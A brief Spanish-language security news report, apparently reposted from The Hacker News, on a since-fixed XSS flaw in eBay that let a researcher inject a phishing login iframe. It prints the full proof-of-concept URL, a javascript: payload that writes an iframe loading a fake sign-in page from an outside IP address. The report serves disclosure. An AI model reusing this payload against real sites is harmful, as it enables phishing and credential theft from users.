Vulnerabilidad crítica de XSS en eBay permite ataques de Phishing

Se ha descubierto un fallo simple pero efectivo en el sitio web de eBay, que dejaría expuesto a millones de clientes a ataques de Phishing. Un investigador de seguridad, identificado como MPL, informó de esta vulnerabilidad crítica en eBay el mes pasado. Mediante este ataque se puede simular una página falsa de inicio de sesión (phishing),en el sitio web de eBay y robar las contraseñas de los usuarios.

MLT publicó la vulnerabilidad el lunes pasado, demostrando lo fácil que era explotar el fallo y robar contraseñas de los clientes. La falla residía (ya fue solucionada) en el manejo de parámetro en la URL y se podía inyectar un iframe en la página web de eBay.

MLT incluyó un iframe a su propia página de phishing y hace que el sitio original de eBay muestre una página de inicio de sesión como si fuera legítima.
http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29
En este caso el iframe contiene la página de phishing.

MLT publicó un video con la explotación de la vulnerabilidad.

Fuente: The Hackers News